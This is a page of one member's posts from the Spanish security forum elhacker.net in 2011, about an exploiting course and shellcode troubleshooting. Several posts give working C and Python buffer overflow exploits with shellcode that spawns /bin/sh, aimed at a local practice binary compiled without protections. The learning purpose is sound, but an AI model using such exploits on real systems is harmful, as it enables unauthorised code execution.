elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16
141  Seguridad Informática / Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : Grupos en: 26 Febrero 2011, 21:40 pm
Por desgracia el curso está decayendo. No voy a poder dar ninguna conferencia, y Iván está muy ocupado últimamente. Alguien se ofrecería a dar los cursos?

Siento las molestias, pero es algo difícil...

Si pudierais aplazarlo seria genial.

Sino, yo podria ir haciendo pequeños prologos a ratos, sobre programacion o uso de gdb o asi...
Ya sabes, mientras podeis empezar con esto, para que la gente vaya aprendiendo algo.

Sa1uDoS

@Sagrini Agregame al MSN.
142  Seguridad Informática / Bugs y Exploits / Re: eliminar caracteres nulos de mi shellcode en: 26 Febrero 2011, 12:02 pm
No es exactamente eso. Si sólo modificas al puede que el registro te quede 0x42420000 o demás. Para lo que necesitas tienes que hacer una especie de typedef, traduciendo, indicarle al ensamblador cuántos bytes vás a meter...

P. Ej.
Código
  1. push byte 0x1
  2. mov eax, esp
  3.  
Eso sería mejor, aunque no sé si es correcto :P Movería la dirección de 1 a eax.

Suerte!

Si, pero en el registro te quedara 00000001, lo interesante no es que en el registro no te quede con 0, si no que EN LOS OPCODE'S NO SALGAN LOS 0, y si solo pones AX o AH o AL, depende de los bytes que vayas a meter pues en la shellcode deberia quedar JUSTO.

Sa1uDoS ;).
143  Seguridad Informática / Bugs y Exploits / Re: eliminar caracteres nulos de mi shellcode en: 25 Febrero 2011, 15:23 pm
Utiliza AX en vez de EAX, asi solo envias lo justo y no tiene que rellenar nada. Creo que funcionara.

Sa1uDoS
144  Programación / Programación General / Re: Otra vez al ruedo: ¿hacer un SO? en: 22 Febrero 2011, 13:28 pm
Podeis fijaros y tomar ideas de Luxur.

http://luxur.comoj.com/

Me parece una idea genial ;).

Sa1uDoS
145  Seguridad Informática / Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : Grupos en: 13 Febrero 2011, 21:27 pm
u.u Grupo 3, si que soy viejo xD.

Tengo CASI todo, SuSe linux 11.1 (i586) pero me falta el Skype.

Sa1uDoS
146  Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona? en: 7 Febrero 2011, 15:58 pm
No, eso que pusiste no es mi code.

Tiene errores, como
Código:
char nops[23] = "";
es nops[24] ;). Quiza por eso te tira segmentation fault.

Y eso del sprintf que ya te dije ;).



Pon mas informacion, que distro usas ???

Yo uso OpenSuSe y me funciona perfecto.

Sa1uDoS

P.D.:Agregame al MSN si quieres y miramos que es con mas detalle ;).



EDIT:

A mi asi me funciona:
Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5. int main(){
  6.  
  7. char exp[] = "./bof";
  8. char nops[24] = "";
  9. memset(nops, '\x90', 23);
  10. char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  11. char ret[]="\x18\x1f\x9b\xbf";
  12.  
  13. char *cmd;
  14. cmd=(char *)malloc(strlen(exp) + strlen(nops) + strlen(shellcode) + strlen(ret) + 1);
  15.  
  16. sprintf(cmd,"%s %s%s%s", exp, nops, shellcode, ret);
  17.  
  18. system(cmd);
  19. free(cmd);
  20.  
  21. return 0;
  22. }
  23.  



EDIT2:

Prueba si quieres con una shellcode que he hecho yo ;), aunque la de Sagrini va genial tambien.

Código
  1. #include <stdio.h> /* Para Sprintf */
  2. #include <string.h> /* Para memset */
  3. #include <stdlib.h> /*Para malloc y system */
  4.  
  5. int main()
  6. {
  7. char name[]="./bof";
  8. char nops[26]="";
  9. memset(nops, '\x90', 25); /* Copiamos el byte 90 25 veces en la variable nops */
  10. char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
  11. "\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
  12. char ret[]="\x18\x1f\x9b\xbf";
  13.  
  14. char *cmd;/* Definimos un puntero donde juntaremos todo, para llamarlo con system */
  15. cmd=(char *)malloc(sizeof(name)+sizeof(nops)+sizeof(shellcode)+sizeof(ret)+1);/* Reservamos la memoria necesaria
  16. para juntar todo */
  17. sprintf(cmd, "%s %s%s%s", name,nops,shellcode,ret);/* Juntamos name, nop, shellcode y ret en el
  18. puntero cmd, entre name y los demas campos dejamos un espacio */
  19. system(cmd);
  20. free(cmd);/* Liberamos la memoria */
  21. return 0;
  22. }
  23.  
147  Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona? en: 7 Febrero 2011, 06:57 am
Porque dejas esto asi ???

Código:
sprintf(cmd,"%s %s %s %s", exp, nops, shellcode, ret);

Tiene que ser
Código:
sprintf(cmd,"%s %s%s%s", exp, nops, shellcode, ret);

Sino es normal que no te funcione ;).

Si lo copias tal y como esta (mi codigo) no te funciona ???

Has compilado vuln como
Código:
gcc -o vuln vuln.c --no-stack-protector -g -z execstack
???

Sa1uDoS
148  Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona? en: 6 Febrero 2011, 12:55 pm
Yo no he tenido ningun problema en hacer el exploit ni en C, ni en Python ;).

C:
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. int main()
  6. {
  7. char name[]="./bof";
  8. char nops[24]="";
  9. memset(nops, '\x90', 23); /* Copiamos el byte 90 23 veces en la variable nops */
  10. char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  11. char ret[]="\x18\x1f\x9b\xbf";
  12.  
  13. char *cmd;/* Definimos un puntero donde juntaremos todo, para llamarlo con system */
  14. cmd=(char *)malloc(strlen(name)+strlen(nops)+strlen(shellcode)+strlen(ret)+1);/* Reservamos la memoria necesaria
  15. para juntar todo */
  16. sprintf(cmd, "%s %s%s%s", name,nops,shellcode,ret);/* Juntamos name, nop, shellcode y ret en el
  17. puntero cmd, entre name y los demas campos dejamos un espacio */
  18. system(cmd);
  19. free(cmd);/* Liberamos la memoria */
  20. return 0;
  21. }
  22.  



Python:
Código
  1. import os
  2. archivo="./bof "
  3. nops="\x90" * 23
  4. shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
  5. ret="\x18\x1f\x9b\xbf"
  6.  
  7. os.system(archivo+nops+shellcode+ret)
  8.  

Espero haberte ayudado, porque no se si llegaste a resolver tu duda ;).

Sa1uDoS
149  Seguridad Informática / Bugs y Exploits / Re: [Taller] Curso Exploiting elhacker.net 2011 : ¿Te apuntas? en: 2 Febrero 2011, 22:11 pm
Yo me apunto, en principio, para aprender, si necesitan tambien puedo colaborar en algunas partes.

Me parece una muy buena iniciativa.

Sa1uDoS
150  Programación / Scripting / Re: [RETO+Python] A ver quien la tiene mas corta... (v2) en: 14 Enero 2011, 15:15 pm
Jeje, con el segundo while acortas codigo :D.

Para poner el codigo resaltado usa el GeSHi osea, pones
Código
  1.  
[/b] por ejemplo para Python
Código
  1. print "Hola"
.

Sa1uDoS
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines